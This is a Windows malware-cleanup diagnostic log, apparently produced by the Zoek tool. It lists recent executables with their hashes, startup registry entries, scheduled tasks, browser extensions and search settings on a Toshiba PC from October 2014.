2014-10-27 22:51:39 731BB89065411453860C48EEE348961E 120407800 ----a-w- C:\Users\ADH.Heathman-PC\Downloads\msert.exe

2014-10-24 23:49:53 -------- d--h--w- C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}

2014-10-17 17:57:46 29F7E0A2249E73F3E02C38687A867671 127289600 ----a-w- C:\Users\Heathman\Downloads\msert (1).exe

====== C: exe-files ==

2014-10-30 11:57:43 AA3520FB0133A56BEE1DB34D74DBEF64 0 ----a-we C:\ProgramData\Oracle\Java\javapath\java.exe

2014-10-30 11:57:43 75D477E868CA51EC1B09D730570F322B 0 ----a-we C:\ProgramData\Oracle\Java\javapath\javaw.exe

2014-10-30 11:57:43 691D49FB44EDE9788288CABE4F7E0DAF 0 ----a-we C:\ProgramData\Oracle\Java\javapath\javaws.exe

2014-10-30 11:57:39 E3E6B18458FFB07CB24D7A0BA77C9FDF 15784 ----a-w- C:\Program Files (x86)\Java\jre1.8.0_25\bin\pack200.exe

2014-10-30 11:57:39 DC197DCE6325CBAC905DE0D0E3BA3E8E 15784 ----a-w- C:\Program Files (x86)\Java\jre1.8.0_25\bin\rmid.exe

2014-10-30 11:57:39 B719E0F43166037DF46B5CFBE60A5118 15784 ----a-w- C:\Program Files (x86)\Java\jre1.8.0_25\bin\jjs.exe

2014-10-30 11:57:39 A458E2535E46151690E53E2A03FAA711 15784 ----a-w- C:\Program Files (x86)\Java\jre1.8.0_25\bin\keytool.exe

2014-10-30 11:57:39 9BFAEF308D50779F6B255CB7BA7DCA5A 15784 ----a-w- C:\Program Files (x86)\Java\jre1.8.0_25\bin\kinit.exe

2014-10-30 11:57:39 7AB1F1B3FB6C3DACA34EA2F988CDF5AC 16296 ----a-w- C:\Program Files (x86)\Java\jre1.8.0_25\bin\orbd.exe

2014-10-30 11:57:39 75EE99C7F0038C746D82C76221ECA4EF 16296 ----a-w- C:\Program Files (x86)\Java\jre1.8.0_25\bin\policytool.exe

2014-10-30 11:57:39 75D477E868CA51EC1B09D730570F322B 176552 ----a-w- C:\Program Files (x86)\Java\jre1.8.0_25\bin\javaw.exe

2014-10-30 11:57:39 691D49FB44EDE9788288CABE4F7E0DAF 272296 ----a-w- C:\Program Files (x86)\Java\jre1.8.0_25\bin\javaws.exe

2014-10-30 11:57:39 67F763B09F4BC8689E6FA9761E068D74 159656 ----a-w- C:\Program Files (x86)\Java\jre1.8.0_25\bin\unpack200.exe

2014-10-30 11:57:39 57E1F756FAA787623DFCD2C1B2AACC68 51112 ----a-w- C:\Program Files (x86)\Java\jre1.8.0_25\bin\ssvagent.exe

2014-10-30 11:57:39 4367C05B0CF5553E71B34F51003D0615 76200 ----a-w- C:\Program Files (x86)\Java\jre1.8.0_25\bin\jp2launcher.exe

2014-10-30 11:57:39 4109C4DB4BD48F5BF8115C7523A6B6F8 15784 ----a-w- C:\Program Files (x86)\Java\jre1.8.0_25\bin\klist.exe

2014-10-30 11:57:39 33D2AF53E209DA3E2BA939EB89801DC0 16296 ----a-w- C:\Program Files (x86)\Java\jre1.8.0_25\bin\rmiregistry.exe

2014-10-30 11:57:39 29E65AC6AFD8A0A9CAA361FF6F7B4886 16296 ----a-w- C:\Program Files (x86)\Java\jre1.8.0_25\bin\servertool.exe

2014-10-30 11:57:39 28FC00F89631B0F6E1E9CA386FADD566 16296 ----a-w- C:\Program Files (x86)\Java\jre1.8.0_25\bin\tnameserv.exe

2014-10-30 11:57:39 26C7F32186B1F0364CD06EA69227A79D 15784 ----a-w- C:\Program Files (x86)\Java\jre1.8.0_25\bin\ktab.exe

2014-10-30 11:57:38 BB8C890E3E6372F2720709262BD42BF4 30632 ----a-w- C:\Program Files (x86)\Java\jre1.8.0_25\bin\jabswitch.exe

2014-10-30 11:57:38 AA3520FB0133A56BEE1DB34D74DBEF64 176552 ----a-w- C:\Program Files (x86)\Java\jre1.8.0_25\bin\java.exe

2014-10-30 11:57:38 74713E9C1B01B152DDD3A1A3519A3647 15784 ----a-w- C:\Program Files (x86)\Java\jre1.8.0_25\bin\java-rmi.exe

2014-10-30 11:57:38 70E67429D2C011FD0419AF899A8D0D70 68520 ----a-w- C:\Program Files (x86)\Java\jre1.8.0_25\bin\javacpl.exe

2014-10-30 11:42:05 2D01F001F8E45924E57B7BB77CF96BC2 28368 ----a-w- C:\Windows\System32\IEUDINIT.EXE

2014-10-30 11:40:25 344DA9D196C0D98A738289BB09CE4CF6 940032 ----a-w- C:\Windows\System32\MsSpellCheckingFacility.exe

2014-10-30 11:40:19 F9F310F9FB7F294F00ABDD03453D8CEE 812736 ----a-w- C:\Program Files (x86)\Internet Explorer\iexplore.exe

2014-10-30 11:40:19 C1A6E565B2782C09BC40AD749B46D9ED 71680 ----a-w- C:\Windows\SysWOW64\RegisterIEPKEYs.exe

2014-10-30 11:40:19 ABDFC692D9FE43E2BA8FE6CB5A8CB95A 13312 ----a-w- C:\Windows\SysWOW64\mshta.exe

2014-10-30 11:40:19 AA103FEAD721863B86A1B1260948E662 112128 ----a-w- C:\Windows\SysWOW64\ieUnatt.exe

2014-10-30 11:40:19 9A33FDDD687A836A1FD478B43C5A95FD 151552 ----a-w- C:\Windows\SysWOW64\iexpress.exe

2014-10-30 11:40:19 887055A3C8DD6C87D200D11EAFDBD45B 74240 ----a-w- C:\Windows\SysWOW64\SetIEInstalledDate.exe

2014-10-30 11:40:19 7F7F391491C315A4A72EFCAC0D34FA93 25600 ----a-w- C:\Program Files (x86)\Internet Explorer\ExtExport.exe

2014-10-30 11:40:19 6A92CEC8532056791C6832B2725D170D 139264 ----a-w- C:\Windows\SysWOW64\wextract.exe

2014-10-30 11:40:19 54C9747BB0A64F4D9D401E4648363386 222720 ----a-w- C:\Program Files (x86)\Internet Explorer\ielowutil.exe

2014-10-30 11:40:19 53FC62C51CB18C9100A7DFAF2D2A6C47 12800 ----a-w- C:\Windows\SysWOW64\msfeedssync.exe

2014-10-30 11:40:19 53E24F2DB97EFAF85FE093AA254790EC 470528 ----a-w- C:\Program Files (x86)\Internet Explorer\ieinstal.exe

2014-10-30 11:40:18 F9FA80C1CB6EAC55A7F534937F6AC4E4 139264 ----a-w- C:\Windows\System32\ieUnatt.exe

2014-10-30 11:40:18 E9109E91BB8366759822DC2FC9B5DA8B 111616 ----a-w- C:\Windows\System32\ieetwcollector.exe

2014-10-30 11:40:18 E4A6577D74B2439974C8018AB5F1BFEA 13312 ----a-w- C:\Windows\System32\msfeedssync.exe

2014-10-30 11:40:18 C876F8303AA30481A36FE2AACDE77671 483840 ----a-w- C:\Program Files\Internet Explorer\ieinstal.exe

2014-10-30 11:40:18 95828D670CFD3B16EE188168E083C3C5 13824 ----a-w- C:\Windows\System32\mshta.exe

2014-10-30 11:40:18 6B9FDB34A5A490FF6A7EDE280062626A 810680 ----a-w- C:\Program Files\Internet Explorer\iexplore.exe

2014-10-30 11:40:18 649E8F572EC0D929F4EED13A53AC0475 222720 ----a-w- C:\Program Files\Internet Explorer\ielowutil.exe

2014-10-30 11:40:18 5141B67F14E2B6CBB6ADF851ABE364A5 90112 ----a-w- C:\Windows\System32\SetIEInstalledDate.exe

2014-10-30 11:40:18 46FD16F9B1924A2EA8CD5C6716CC654F 167424 ----a-w- C:\Windows\System32\iexpress.exe

2014-10-30 11:40:18 4399857346DD183683332921500046B1 86016 ----a-w- C:\Windows\System32\RegisterIEPKEYs.exe

2014-10-30 11:40:18 41F922D6A794C0F8425C8436D7077C84 359632 ----a-w- C:\Program Files\Internet Explorer\iediagcmd.exe

2014-10-30 11:40:18 29C0530E0F120AC3E583889DCD6A63DD 710656 ----a-w- C:\Windows\System32\ie4uinit.exe

2014-10-30 11:40:18 1EA6500C25A80E8BDB65099C509AF993 143872 ----a-w- C:\Windows\System32\wextract.exe

2014-10-29 22:50:15 E273331224005C5A8A504164373DE1DC 535304 ----a-w- C:\Program Files (x86)\ESET\ESET Online Scanner\OnlineScannerApp.exe

2014-10-29 22:50:15 9E47522861242EE002D7F385C35D1322 2887824 ----a-w- C:\Program Files (x86)\ESET\ESET Online Scanner\ESETSmartInstaller.exe

2014-10-29 22:50:15 5B3DE7968D23B476AFB256D8014B25B9 333424 ----a-w- C:\Program Files (x86)\ESET\ESET Online Scanner\OnlineCmdLineScannerA.exe

2014-10-29 22:50:15 47B06E473B78A792DF07D226E0537D63 119184 ----a-w- C:\Program Files (x86)\ESET\ESET Online Scanner\OnlineScannerUninstaller.exe

2014-10-29 22:50:15 3C3F35C91F230493B088B334E39D1F7A 358144 ----a-w- C:\Program Files (x86)\ESET\ESET Online Scanner\OnlineCmdLineScanner.exe

2014-10-29 22:49:53 E8D3E34FFDAF21DF7C09CBBBA5763237 2347384 ----a-w- C:\Users\ADH.Heathman-PC\Downloads\esetsmartinstaller_enu.exe

2014-10-29 17:09:36 DCC534F22A5A4B43E5123A772D3ECF5A 895568 ----a-w- C:\Program Files (x86)\Google\Update\Download\{4DC8B4CA-1BDA-483E-B5FA-D3C12E15B62D}\38.0.2125.111\38.0.2125.111_38.0.2125.104_chrome_updater.exe

2014-10-29 14:36:20 E5F8EC7A540C12704251C1655D187678 8192 ----a-w- C:\Users\ADH.Heathman-PC\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JWC22V15\installer_adobe_flash_player_English[1].exe

2014-10-29 14:35:33 6AD76FFDDA7E1F03BFC641B54DF8925C 8192 ----a-w- C:\Users\ADH.Heathman-PC\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\OUWPNNBG\installer_adobe_flash_player_English[1].exe

2014-10-29 14:34:22 6964616C0D8B81B493C69ED9C0FC5DC6 8192 ----a-w- C:\Users\ADH.Heathman-PC\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XBAQWK47\installer_adobe_flash_player_English[1].exe

2014-10-29 13:07:36 4ADCFEE16EE9978F06157634669D36FB 602112 ----a-w- C:\Users\ADH.Heathman-PC\Desktop\OTL.exe

2014-10-29 12:08:37 F042EE4C8D66248D9B86DCF52ABAE416 256000 ----a-w- C:\Windows\PEV.exe

2014-10-29 12:08:37 5E832F4FAF5F481F2EAF3B3A48F603B8 68096 ----a-w- C:\Windows\zip.exe

2014-10-29 12:08:37 0277C027A26428DB64EF4F64F52BB4FD 208896 ----a-w- C:\Windows\MBR.exe

2014-10-29 12:08:36 9E05A9C264C8A908A8E79450FCBFF047 80412 ----a-w- C:\Windows\grep.exe

2014-10-29 12:08:36 0297C72529807322B152F517FDB0A9FC 406528 ----a-w- C:\Windows\SWSC.exe

2014-10-29 04:15:21 D38C4B9A4B1E3E64A1EDF8003E921DB2 1460 ----a-w- C:\Users\ADH.Heathman-PC\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\FZ3GCYUW\PCPerformerSetup[1].exe

2014-10-29 03:33:56 5DCED6B6A9BF0C12079E8F9513B3C8C1 4974864 ----a-w- C:\Users\Heathman\Downloads\ccsetup419.exe

2014-10-29 03:03:50 943C708E6C85202BB41BAAED958F2D07 2113024 ----a-w- C:\Users\ADH.Heathman-PC\Desktop\FRST64\FRST-OlderVersion\FRST64.exe

2014-10-29 03:03:50 80354F83C3D457FC5FB6CE1CF08835C1 2113536 ----a-w- C:\Users\ADH.Heathman-PC\Desktop\FRST64\FRST64.exe

2014-10-27 22:51:39 731BB89065411453860C48EEE348961E 120407800 ----a-w- C:\Users\ADH.Heathman-PC\Downloads\msert.exe

2014-10-25 19:00:01 821E577AB0B119278BD1940FEF224DDA 51080 ----atw- C:\Program Files (x86)\Google\Update\1.3.25.5\GoogleUpdateBroker.exe

2014-10-25 19:00:01 4067DC9EA0640485F1CF395427FD5E9B 51080 ----atw- C:\Program Files (x86)\Google\Update\1.3.25.5\GoogleUpdateOnDemand.exe

2014-10-25 18:59:50 27DC334376EE08A0962E6367E23D3CBA 880272 ----a-w- C:\Program Files (x86)\Google\Update\1.3.25.5\GoogleUpdateSetup.exe

2014-10-25 18:59:23 976D5F35A058340DA2C160CEC4063C4B 230792 ----atw- C:\Program Files (x86)\Google\Update\1.3.25.5\GoogleCrashHandler.exe

2014-10-25 18:59:23 26E37D5EAC3F1CF66587183AB348168C 114568 ----atw- C:\Program Files (x86)\Google\Update\1.3.25.5\GoogleUpdateComRegisterShell64.exe

2014-10-25 18:59:23 047556104954A72A2222FFF169166EEE 285064 ----atw- C:\Program Files (x86)\Google\Update\1.3.25.5\GoogleCrashHandler64.exe

2014-10-25 18:59:10 51508F0C2476177E50C31B0BBFBF1BDB 107912 ----atw- C:\Program Files (x86)\Google\Update\1.3.25.5\GoogleUpdate.exe

2014-10-25 18:59:06 27DC334376EE08A0962E6367E23D3CBA 880272 ----a-w- C:\Program Files (x86)\Google\Update\Download\{430FD4D0-B729-4F61-AA34-91526481799D}\1.3.25.5\GoogleUpdateSetup.exe

2014-10-24 23:18:04 77ED3BFE03113FB4A2D674BC62080521 424248 ----a-w- C:\ProgramData\NVIDIA\Updatus\Download\6694\updatus.19000563_RUNASUSER.exe

=== C: other files ==

2014-10-30 11:57:39 CE44A9D4918DCDC7CCCF5503BF4D7A3D 14130 ----a-w- C:\Program Files (x86)\Java\jre1.8.0_25\lib\deploy\ffjcext.zip

==== Startup Registry Enabled ======================

[HKEY_USERS\S-1-5-21-616022151-183045692-1389677156-1011\Software\Microsoft\Windows\CurrentVersion\Run]

"Sidebar"="%ProgramFiles%\Windows\Sidebar.exe /autoRun"

[HKEY_USERS\S-1-5-21-616022151-183045692-1389677156-1014\Software\Microsoft\Windows\CurrentVersion\Run]

"swg"="C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe"

[HKEY_USERS\S-1-5-21-616022151-183045692-1389677156-1011\Software\Microsoft\Windows\CurrentVersion\RunOnce]

"mctadmin"="C:\Windows\System32\mctadmin.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

"SVPWUTIL"="C:\Program Files (x86)\TOSHIBA\Utilities\SVPWUTIL.exe SVPwUTIL"

"HWSetup"="C:\Program Files\TOSHIBA\Utilities\HWSetup.exe hwSetUP"

"KeNotify"="C:\Program Files (x86)\TOSHIBA\Utilities\KeNotify.exe LPCM"

"ToshibaServiceStation"="C:\Program Files (x86)\TOSHIBA\TOSHIBA Service Station\ToshibaServiceStation.exe /hide:60"

"ToshibaAppPlace"="C:\Program Files (x86)\Toshiba\Toshiba App Place\ToshibaAppPlace.exe"

"Samsung PanelMgr"="C:\windows\Samsung\PanelMgr\ssmmgr.exe /autorun"

"APSDaemon"="C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe"

"iTunesHelper"="C:\Program Files (x86)\iTunes\iTunesHelper.exe"

"SunJavaUpdateSched"="C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"

"Adobe ARM"="C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]

"swg"="C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe"

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows]

"AppInit_DLLs"="C:\\Windows\\SysWOW64\\nvinit.dll"

==== Startup Registry Enabled x64 ======================

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

"IgfxTray"="C:\windows\system32\igfxtray.exe"

"HotKeysCmds"="C:\windows\system32\hkcmd.exe"

"Persistence"="C:\windows\system32\igfxpers.exe"

"RtHDVCpl"="C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe -s"

"RtHDVBg"="C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe /FORPCEE3 /MAXX3 "

"IntelPAN"="C:\Program Files\Common Files\Intel\WirelessCommon\iFrmewrk.exe /tf Intel PAN Tray"

"TosVolRegulator"="C:\Program Files\TOSHIBA\TosVolRegulator\TosVolRegulator.exe"

"TPwrMain"="%ProgramFiles%\TOSHIBA\Power Saver\TPwrMain.EXE"

"HSON"="%ProgramFiles%\TOSHIBA\TBS\HSON.exe "

"TCrdMain"="%ProgramFiles%\TOSHIBA\FlashCards\TCrdMain.exe "

"SynTPEnh"="%ProgramFiles%\Synaptics\SynTP\SynTPEnh.exe "

"Teco"=""%ProgramFiles%\TOSHIBA\TECO\Teco.exe" /r"

"TosSENotify"="C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosWaitSrv.exe"

"TosWaitSrv"="%ProgramFiles%\TOSHIBA\TPHM\TosWaitSrv.exe "

"TosNC"="%ProgramFiles%\Toshiba\BulletinBoard\TosNcCore.exe "

"TosReelTimeMonitor"="%ProgramFiles%\TOSHIBA\ReelTime\TosReelTimeMonitor.exe "

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows]

"AppInit_DLLs"="C:\\Windows\\System32\\nvinitx.dll"

==== Startup Registry Disabled x64 ======================

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\Adobe ARM]

"command"="\"C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\AdobeARM.exe\""

"hkey"="HKLM"

"item"="Adobe ARM"

"key"="SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\Adobe Reader Speed Launcher]

"command"="\"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Reader\\Reader_sl.exe\""

"hkey"="HKLM"

"item"="Adobe Reader Speed Launcher"

"key"="SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\iTunesHelper]

"command"="\"C:\\Program Files (x86)\\iTunes\\iTunesHelper.exe\""

"hkey"="HKLM"

"item"="iTunesHelper"

"key"="SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\QuickTime Task]

"command"="\"C:\\Program Files (x86)\\QuickTime\\QTTask.exe\" -atboottime"

"hkey"="HKLM"

"item"="QuickTime Task"

"key"="SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run"

==== Task Scheduler Jobs ======================

C:\windows\tasks\Adobe Flash Player Updater.job --a------ C:\windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [09/23/2014 08:24 PM]

C:\windows\tasks\GoogleUpdateTaskMachineCore.job --a------ C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [10/25/2014 01:59 PM]

C:\windows\tasks\GoogleUpdateTaskMachineUA.job --a------ C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [10/25/2014 01:59 PM]

C:\windows\tasks\GoogleUpdateTaskUserS-1-5-21-616022151-183045692-1389677156-1002Core.job --a------ C:\Users\Heathman\AppData\Local\Google\Update\GoogleUpdate.exe [10/11/2012 08:07 PM]

C:\windows\tasks\GoogleUpdateTaskUserS-1-5-21-616022151-183045692-1389677156-1002UA.job --a------ C:\Users\Heathman\AppData\Local\Google\Update\GoogleUpdate.exe [10/11/2012 08:07 PM]

==== Other Scheduled Tasks ======================

"C:\windows\SysNative\tasks\Adobe Flash Player Updater" [C:\windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe]

"C:\windows\SysNative\tasks\GoogleUpdateTaskMachineCore" [C:\Program Files (x86)\Google\Update\GoogleUpdate.exe]

"C:\windows\SysNative\tasks\GoogleUpdateTaskMachineUA" [C:\Program Files (x86)\Google\Update\GoogleUpdate.exe]

"C:\windows\SysNative\tasks\GoogleUpdateTaskUserS-1-5-21-616022151-183045692-1389677156-1002Core" [C:\Users\Heathman\AppData\Local\Google\Update\GoogleUpdate.exe]

"C:\windows\SysNative\tasks\GoogleUpdateTaskUserS-1-5-21-616022151-183045692-1389677156-1002UA" [C:\Users\Heathman\AppData\Local\Google\Update\GoogleUpdate.exe]

"C:\windows\SysNative\tasks\IHSelfDeleteTASK" [CMD]

"C:\windows\SysNative\tasks\IHUninstallTrackingTASK" [CMD]

"C:\windows\SysNative\tasks\MotoCast Update" ["C:\Program Files (x86)\Motorola Mobility\MotoCast\LiveUpdate\MotoCastUpdate.exe"]

"C:\windows\SysNative\tasks\Motorola Device Manager Engine" ["C:\Program Files (x86)\Motorola Mobility\Motorola Device Manager\MotorolaDeviceManagerUpdate.exe"]

"C:\windows\SysNative\tasks\Motorola Device Manager Initial Update" ["C:\Program Files (x86)\Motorola Mobility\Motorola Device Manager\MotorolaDeviceManagerUpdate.exe"]

"C:\windows\SysNative\tasks\Motorola Device Manager Update" ["C:\Program Files (x86)\Motorola Mobility\Motorola Device Manager\MotorolaDeviceManagerUpdate.exe"]

"C:\windows\SysNative\tasks\Norton WSC Integration" ["C:\Program Files (x86)\Norton 360\Engine\21.6.0.32\WSCStub.exe"]

"C:\windows\SysNative\tasks\TOSHIBA Wireless Display Monitor" [C:\Program Files (x86)\TOSHIBA\widimon\widimon.exe]

"C:\windows\SysNative\tasks\User_Feed_Synchronization-{33596801-E64F-4DCE-B487-9E9DBE9DB15C}" [C:\windows\system32\msfeedssync.exe]

"C:\windows\SysNative\tasks\{E61DD5E1-BD52-2A9D-750F-258FE7FE9D61}" [C:\windows\system32\regsvr32.exe]

"C:\windows\SysNative\tasks\Apple\AppleSoftwareUpdate" [C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe]

"C:\windows\SysNative\tasks\Norton 360\Norton Error Analyzer" [C:\Program Files (x86)\Norton 360\Engine\21.6.0.32\SymErr.exe]

"C:\windows\SysNative\tasks\Norton 360\Norton Error Processor" [C:\Program Files (x86)\Norton 360\Engine\21.6.0.32\SymErr.exe]

"C:\windows\SysNative\tasks\OfficeSoftwareProtectionPlatform\SvcRestartTask" [%systemroot%\system32\sc.exe start osppsvc]

==== Firefox Extensions Registry ======================

[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Mozilla\Firefox\Extensions]

"{2D3F3651-74B9-4795-BDEC-6DA2F431CB62}"="C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\N360_21.6.0.32\coFFPlgn" [10/30/2014 06:45 AM]

==== Firefox Extensions ======================

ProfilePath: C:\Users\Heathman\AppData\Roaming\TomTom\HOME\Profiles\45jhtpov.default

- Map status indicator - C:\Program Files (x86)\TomTom HOME 2\xul\extensions\MapShare-status@tomtom.com

- TomTom HOME default theme - C:\Program Files (x86)\TomTom HOME 2\xul\extensions\baseTheme@tomtom.com

- Emulator - %ProfilePath%\extensions\Navcore.8.010.9369@tomtom.com

==== Firefox Plugins ======================

==== Chromium Look ======================

HKEY_LOCAL_MACHINE\SOFTWARE\Google\Chrome\Extensions

iikflkcanblccfahdhdonehdalibjnif - No path found[]

mkfokfffehpeedafpekjeddnmnjhmcmk - C:\Program Files (x86)\Norton 360\Engine\21.6.0.32\Exts\Chrome.crx[09/20/2014 03:52 AM]

Google Slides - ADH.Heathman-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek

Google Docs - ADH.Heathman-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake

Google Drive - ADH.Heathman-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf

YouTube - ADH.Heathman-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo

Google Search - ADH.Heathman-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf

Google Sheets - ADH.Heathman-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap

Norton Identity Safe - ADH.Heathman-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\iikflkcanblccfahdhdonehdalibjnif

Norton Security Toolbar - ADH.Heathman-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\mkfokfffehpeedafpekjeddnmnjhmcmk

Google Wallet - ADH.Heathman-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda

Gmail - ADH.Heathman-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia

Google Slides - ADH~1.HEA\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek

Google Docs - ADH~1.HEA\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake

Google Drive - ADH~1.HEA\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf

YouTube - ADH~1.HEA\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo

Google Search - ADH~1.HEA\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf

Google Sheets - ADH~1.HEA\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap

Norton Identity Safe - ADH~1.HEA\AppData\Local\Google\Chrome\User Data\Default\Extensions\iikflkcanblccfahdhdonehdalibjnif

Norton Security Toolbar - ADH~1.HEA\AppData\Local\Google\Chrome\User Data\Default\Extensions\mkfokfffehpeedafpekjeddnmnjhmcmk

Google Wallet - ADH~1.HEA\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda

Gmail - ADH~1.HEA\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia

==== IE Start and Search Settings ======================

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]

"Start Page"="http://start.toshiba.com/"

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SearchScopes]

"DefaultScope"="{2C284C26-5B06-4DFC-B46C-9D2EA294202A}"

==== All HKCU SearchScopes ======================

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SearchScopes

{0633EE93-D776-472f-A0FF-E1416B8B2E3A} Bing Url="http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IESR02"

{2C284C26-5B06-4DFC-B46C-9D2EA294202A} Bing Url="http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IESR02"

{2D1389C8-B7A4-42B3-9385-7287A26C0DF5} Google Url="http://www.google.com/search?sourceid=ie9&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7TSNP_enUS476"

{3F69DA71-DC06-4D09-BEF6-BC86B2EA700C} Unknown Url="Not_Found"

{AFBCB7E0-F91A-4951-9F31-58FEE57A25C4} Norton Safe Search Url="http://nortonsafe.search.ask.com/web?q={SEARCHTERMS}&o=APN10506&l=dis&prt=360&chn=retail&geo=US&ver=21&locale=en_US&gct=kwd&qsrc=2869"

{C6375EBC-5C3D-4491-AADA-B48CB13B0238} Google Url="http://www.google.com/search?sourceid=ie9&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7TSNP"

==== C:\zoek_backup content ======================

C:\zoek_backup (files=0 folders=0 0 bytes)

==== EOF on Thu 10/30/2014 at 7:14:54.06 ======================